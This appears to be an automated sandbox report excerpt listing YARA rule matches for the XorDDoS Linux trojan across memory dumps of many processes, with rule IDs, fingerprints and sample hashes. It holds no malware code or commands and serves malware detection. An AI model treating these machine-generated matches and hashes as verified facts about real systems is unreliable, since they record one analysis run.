        Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6272.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
